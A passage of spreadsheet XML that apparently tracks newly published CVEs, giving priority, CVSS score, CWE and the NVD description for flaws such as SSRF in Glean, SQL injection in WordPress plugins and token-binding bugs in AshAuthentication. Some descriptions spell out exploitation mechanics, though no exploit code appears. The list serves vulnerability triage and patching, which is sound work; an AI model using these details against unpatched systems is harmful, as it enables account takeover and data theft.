      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54339</t>
        </is>
      </c>
      <c r="D154" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E154" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F154" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G154" s="5" t="inlineStr"/>
      <c r="H154" s="5" t="inlineStr"/>
      <c r="I154" s="5" t="inlineStr"/>
      <c r="J154" s="5" t="inlineStr"/>
      <c r="K154" s="5" t="inlineStr"/>
      <c r="L154" s="5" t="inlineStr"/>
      <c r="M154" s="5" t="inlineStr"/>
      <c r="N154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O154" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P154" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q154" s="5" t="inlineStr"/>
      <c r="R154" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S154" s="5" t="inlineStr">
        <is>
          <t>Glean is a self-hosted RSS reader and personal knowledge management tool. Prior to 0.2.6, POST /api/feeds/discover passes an attacker-supplied feed_url to discover_feed(feed_url), creates a subscription through FeedService.create_subscription(), and enqueues fetch_feed_task. The background path calls fetch_feed(feed.url) and parse_feed(), which assigns each RSS item link to ParsedEntry.url. The task then passes ParsedEntry.url to fetch_and_extract_fulltext(parsed_entry.url) without network-level validation in backend/packages/rss/glean_rss/extractor.py and backend/apps/worker/glean_worker/tasks/feed_fetcher.py. A malicious feed can therefore make the server request private, loopback, link-local, or cloud-metadata resources. The fetched response is stored in Entry.content and can be retrieved through GET /api/entries/{id}, producing non-blind server-side request forgery with full response disclosure. This can bypass network perimeters, probe internal services and ports, expose internal configuration or web content, and potentially disclose cloud metadata access tokens. This issue is fixed in version 0.2.6.</t>
        </is>
      </c>
      <c r="T154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54339</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81546</t>
        </is>
      </c>
      <c r="D155" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E155" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F155" s="5" t="inlineStr">
        <is>
          <t>61adb53e-e4b3-47f7-8a93-4717c9e77dc6</t>
        </is>
      </c>
      <c r="G155" s="5" t="inlineStr"/>
      <c r="H155" s="5" t="inlineStr"/>
      <c r="I155" s="5" t="inlineStr"/>
      <c r="J155" s="5" t="inlineStr"/>
      <c r="K155" s="5" t="inlineStr"/>
      <c r="L155" s="5" t="inlineStr"/>
      <c r="M155" s="5" t="inlineStr"/>
      <c r="N155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O155" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P155" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q155" s="5" t="inlineStr"/>
      <c r="R155" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S155" s="5" t="inlineStr">
        <is>
          <t>The Affinity by Canva application before 3.3.0 (September 2026 release) did not perform adequate bounds checking when parsing Affinity document files leading to a stack-based buffer overflow. A threat actor could craft a Affinity document that when opened by a user in Affinity could result in arbitrary code execution.</t>
        </is>
      </c>
      <c r="T155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81546</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45726</t>
        </is>
      </c>
      <c r="D156" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E156" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F156" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G156" s="5" t="inlineStr"/>
      <c r="H156" s="5" t="inlineStr"/>
      <c r="I156" s="5" t="inlineStr"/>
      <c r="J156" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K156" s="5" t="inlineStr"/>
      <c r="L156" s="5" t="inlineStr"/>
      <c r="M156" s="5" t="inlineStr"/>
      <c r="N156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O156" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P156" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q156" s="5" t="inlineStr"/>
      <c r="R156" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-522, CWE-732</t>
        </is>
      </c>
      <c r="S156" s="5" t="inlineStr">
        <is>
          <t>Omni manages Kubernetes on bare metal, virtual machines, or in a cloud. From 1.3.0 until 1.6.6 and 1.7.3, importing a standalone Talos cluster creates an ImportedClusterSecrets resource containing the cluster's complete CA secrets bundle. The access rules in internal/backend/runtime/omni/state_access.go allow an authenticated user with the Reader role to retrieve the resource through ResourceService if the importing actor has not rotated those secrets, exposing Kubernetes, Talos, and etcd CA private keys plus the service-account key. The Kubernetes CA private key permits certificate signing for privileged identities such as system:masters and provides control of the imported cluster outside Omni's authorization boundary, including its workloads, credentials, and secrets. This issue is fixed in versions 1.6.6 and 1.7.3.</t>
        </is>
      </c>
      <c r="T156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45726</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54506</t>
        </is>
      </c>
      <c r="D157" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E157" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F157" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G157" s="5" t="inlineStr"/>
      <c r="H157" s="5" t="inlineStr"/>
      <c r="I157" s="5" t="inlineStr"/>
      <c r="J157" s="5" t="inlineStr"/>
      <c r="K157" s="5" t="inlineStr"/>
      <c r="L157" s="5" t="inlineStr"/>
      <c r="M157" s="5" t="inlineStr"/>
      <c r="N157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O157" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P157" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q157" s="5" t="inlineStr"/>
      <c r="R157" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-185, CWE-79</t>
        </is>
      </c>
      <c r="S157" s="5" t="inlineStr">
        <is>
          <t>Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. Prior to 1.0.8.5, app/controller/user/profile.php accepts the user[bio] field and passes stored content through sanitizeHTML() in system/functions.php, whose on* event-handler regular expression omits the forward-slash delimiter and whose do-while condition compares the string to itself, so forbidden nested tags are removed only once. An Author-role or higher user can submit solidus-prefixed event-handler markup or nested forbidden tags that survive sanitization. The stored bio is rendered without sufficient output encoding on /author/{username}, in the admin user-management view, and potentially in comment displays, causing attacker-controlled JavaScript to execute when unauthenticated visitors, administrators, or other users view the content. This can expose browser-session data and permit victim-context account actions, defacement, or phishing. This issue is fixed in version 1.0.8.5.</t>
        </is>
      </c>
      <c r="T157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54506</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66618</t>
        </is>
      </c>
      <c r="D158" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E158" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F158" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G158" s="5" t="inlineStr"/>
      <c r="H158" s="5" t="inlineStr"/>
      <c r="I158" s="5" t="inlineStr"/>
      <c r="J158" s="5" t="inlineStr"/>
      <c r="K158" s="5" t="inlineStr"/>
      <c r="L158" s="5" t="inlineStr"/>
      <c r="M158" s="5" t="inlineStr"/>
      <c r="N158" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O158" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P158" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q158" s="5" t="inlineStr"/>
      <c r="R158" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S158" s="5" t="inlineStr">
        <is>
          <t>Administrator SQL Injection in WP Maps &lt;= 4.9.9 versions.</t>
        </is>
      </c>
      <c r="T158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66618</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66619</t>
        </is>
      </c>
      <c r="D159" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E159" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F159" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G159" s="5" t="inlineStr"/>
      <c r="H159" s="5" t="inlineStr"/>
      <c r="I159" s="5" t="inlineStr"/>
      <c r="J159" s="5" t="inlineStr"/>
      <c r="K159" s="5" t="inlineStr"/>
      <c r="L159" s="5" t="inlineStr"/>
      <c r="M159" s="5" t="inlineStr"/>
      <c r="N159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O159" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P159" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q159" s="5" t="inlineStr"/>
      <c r="R159" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S159" s="5" t="inlineStr">
        <is>
          <t>Administrator SQL Injection in Newsletters &lt;= 4.18 versions.</t>
        </is>
      </c>
      <c r="T159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66619</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66624</t>
        </is>
      </c>
      <c r="D160" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E160" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F160" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G160" s="5" t="inlineStr"/>
      <c r="H160" s="5" t="inlineStr"/>
      <c r="I160" s="5" t="inlineStr"/>
      <c r="J160" s="5" t="inlineStr"/>
      <c r="K160" s="5" t="inlineStr"/>
      <c r="L160" s="5" t="inlineStr"/>
      <c r="M160" s="5" t="inlineStr"/>
      <c r="N160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O160" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P160" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q160" s="5" t="inlineStr"/>
      <c r="R160" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S160" s="5" t="inlineStr">
        <is>
          <t>Administrator SQL Injection in WPMasterToolKit &lt;= 2.22.0 versions.</t>
        </is>
      </c>
      <c r="T160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66624</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66625</t>
        </is>
      </c>
      <c r="D161" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E161" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F161" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G161" s="5" t="inlineStr"/>
      <c r="H161" s="5" t="inlineStr"/>
      <c r="I161" s="5" t="inlineStr"/>
      <c r="J161" s="5" t="inlineStr"/>
      <c r="K161" s="5" t="inlineStr"/>
      <c r="L161" s="5" t="inlineStr"/>
      <c r="M161" s="5" t="inlineStr"/>
      <c r="N161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O161" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P161" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q161" s="5" t="inlineStr"/>
      <c r="R161" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S161" s="5" t="inlineStr">
        <is>
          <t>Administrator SQL Injection in WC Vendors Marketplace &lt;= 2.7.2.1 versions.</t>
        </is>
      </c>
      <c r="T161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66625</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66626</t>
        </is>
      </c>
      <c r="D162" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E162" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F162" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G162" s="5" t="inlineStr"/>
      <c r="H162" s="5" t="inlineStr"/>
      <c r="I162" s="5" t="inlineStr"/>
      <c r="J162" s="5" t="inlineStr"/>
      <c r="K162" s="5" t="inlineStr"/>
      <c r="L162" s="5" t="inlineStr"/>
      <c r="M162" s="5" t="inlineStr"/>
      <c r="N162" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O162" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P162" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q162" s="5" t="inlineStr"/>
      <c r="R162" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S162" s="5" t="inlineStr">
        <is>
          <t>Editor SQL Injection in SKT Addons for Elementor &lt;= 4.0 versions.</t>
        </is>
      </c>
      <c r="T162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66626</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66628</t>
        </is>
      </c>
      <c r="D163" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E163" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F163" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G163" s="5" t="inlineStr"/>
      <c r="H163" s="5" t="inlineStr"/>
      <c r="I163" s="5" t="inlineStr"/>
      <c r="J163" s="5" t="inlineStr"/>
      <c r="K163" s="5" t="inlineStr"/>
      <c r="L163" s="5" t="inlineStr"/>
      <c r="M163" s="5" t="inlineStr"/>
      <c r="N163" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O163" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P163" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q163" s="5" t="inlineStr"/>
      <c r="R163" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S163" s="5" t="inlineStr">
        <is>
          <t>Shop manager SQL Injection in WP-Lister Lite for eBay &lt;= 3.8.11 versions.</t>
        </is>
      </c>
      <c r="T163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66628</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66630</t>
        </is>
      </c>
      <c r="D164" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E164" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F164" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G164" s="5" t="inlineStr"/>
      <c r="H164" s="5" t="inlineStr"/>
      <c r="I164" s="5" t="inlineStr"/>
      <c r="J164" s="5" t="inlineStr"/>
      <c r="K164" s="5" t="inlineStr"/>
      <c r="L164" s="5" t="inlineStr"/>
      <c r="M164" s="5" t="inlineStr"/>
      <c r="N164" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O164" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P164" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q164" s="5" t="inlineStr"/>
      <c r="R164" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S164" s="5" t="inlineStr">
        <is>
          <t>Administrator SQL Injection in PublishPress Series &lt;= 3.1.3 versions.</t>
        </is>
      </c>
      <c r="T164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66630</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66631</t>
        </is>
      </c>
      <c r="D165" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E165" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F165" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G165" s="5" t="inlineStr"/>
      <c r="H165" s="5" t="inlineStr"/>
      <c r="I165" s="5" t="inlineStr"/>
      <c r="J165" s="5" t="inlineStr"/>
      <c r="K165" s="5" t="inlineStr"/>
      <c r="L165" s="5" t="inlineStr"/>
      <c r="M165" s="5" t="inlineStr"/>
      <c r="N165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O165" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P165" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q165" s="5" t="inlineStr"/>
      <c r="R165" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S165" s="5" t="inlineStr">
        <is>
          <t>Administrator SQL Injection in MC Woocommerce Wishlist &lt;= 1.9.21 versions.</t>
        </is>
      </c>
      <c r="T165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66631</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78425</t>
        </is>
      </c>
      <c r="D166" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E166" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F166" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G166" s="5" t="inlineStr"/>
      <c r="H166" s="5" t="inlineStr"/>
      <c r="I166" s="5" t="inlineStr"/>
      <c r="J166" s="5" t="inlineStr"/>
      <c r="K166" s="5" t="inlineStr"/>
      <c r="L166" s="5" t="inlineStr"/>
      <c r="M166" s="5" t="inlineStr"/>
      <c r="N166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O166" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P166" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q166" s="5" t="inlineStr"/>
      <c r="R166" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S166" s="5" t="inlineStr">
        <is>
          <t>Authorised users of outside applications behind the same corporate identity provider (IdP), for example, a wiki, a ticketing system, an expenses tool, or anything they legitimately hold an account on can log into their system via SAML SSO. The IdP issues an assertion to them. If that assertion is presented to NeuVector, NeuVector accepts it because the only thing distinguishing "an assertion for NeuVector" from "an assertion for the wiki" is the element, and the `NotInAudience` warning that reports the mismatch is never read.</t>
        </is>
      </c>
      <c r="T166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78425</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80218</t>
        </is>
      </c>
      <c r="D167" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E167" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F167" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G167" s="5" t="inlineStr"/>
      <c r="H167" s="5" t="inlineStr"/>
      <c r="I167" s="5" t="inlineStr"/>
      <c r="J167" s="5" t="inlineStr"/>
      <c r="K167" s="5" t="inlineStr"/>
      <c r="L167" s="5" t="inlineStr"/>
      <c r="M167" s="5" t="inlineStr"/>
      <c r="N167" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O167" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P167" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q167" s="5" t="inlineStr"/>
      <c r="R167" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S167" s="5" t="inlineStr">
        <is>
          <t>Improper Authentication vulnerability in team-alembic AshAuthentication allows an attacker holding a sign-in token for one authenticated resource to be signed in as a user of a different resource.
AshAuthentication.Strategy.Password.SignInWithTokenPreparation.extract_primary_keys_from_subject/2 parses the JWT sub claim (for example user?id=1) with URI.parse/1 and keeps only its query string, discarding the path segment that names the subject the token was issued for. Nothing else restores that binding: AshAuthentication.Jwt.verify/3 checks the signature, exp, nbf, jti and the library-version claims, the purpose check only requires sign_in, and the remaining comparison is over primary-key field names, which are identical across resources. The WebAuthn sign-in and remember-me preparations carry copies of the same helper and drop the path in the same way. The magic link sign-in path pins the subject name against the resource and is not affected.
This issue affects ash_authentication: from 3.10.5 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80218</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82685</t>
        </is>
      </c>
      <c r="D168" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E168" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F168" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G168" s="5" t="inlineStr"/>
      <c r="H168" s="5" t="inlineStr"/>
      <c r="I168" s="5" t="inlineStr"/>
      <c r="J168" s="5" t="inlineStr"/>
      <c r="K168" s="5" t="inlineStr"/>
      <c r="L168" s="5" t="inlineStr"/>
      <c r="M168" s="5" t="inlineStr"/>
      <c r="N168" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O168" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P168" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q168" s="5" t="inlineStr"/>
      <c r="R168" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S168" s="5" t="inlineStr">
        <is>
          <t>Authorization Bypass Through User-Controlled Key vulnerability in team-alembic AshAuthentication allows an authenticated attacker to overwrite and confirm another user's email address, and so take over that account. A confirmation token issued to one user is accepted on any other user's record.
AshAuthentication.AddOn.Confirmation.ConfirmChange verifies the token's signature and its act claim, then applies the changes stored against that token to whichever record the changeset targets, never comparing the sub claim against changeset.data. An attacker who registers an account and changes their own email replays the resulting token against a victim's record id, writing in their own address with force_change_attributes/2 and stamping confirmed_at, after which an ordinary password reset yields the account. The library's own confirmation flow is unaffected, because AshAuthentication.AddOn.Confirmation.Actions.confirm/3 resolves sub to a user and targets that record.
This issue affects ash_authentication: from 0.5.0 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82685</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25275</t>
        </is>
      </c>
      <c r="D169" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E169" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F169" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G169" s="5" t="inlineStr"/>
      <c r="H169" s="5" t="inlineStr"/>
      <c r="I169" s="5" t="inlineStr"/>
      <c r="J169" s="5" t="inlineStr"/>
      <c r="K169" s="5" t="inlineStr"/>
      <c r="L169" s="5" t="inlineStr"/>
      <c r="M169" s="5" t="inlineStr"/>
      <c r="N169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O169" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P169" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q169" s="5" t="inlineStr"/>
      <c r="R169" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S169" s="5" t="inlineStr">
        <is>
          <t>Transient DOS when processing authentication frames with invalid FILS information element header lengths.</t>
        </is>
      </c>
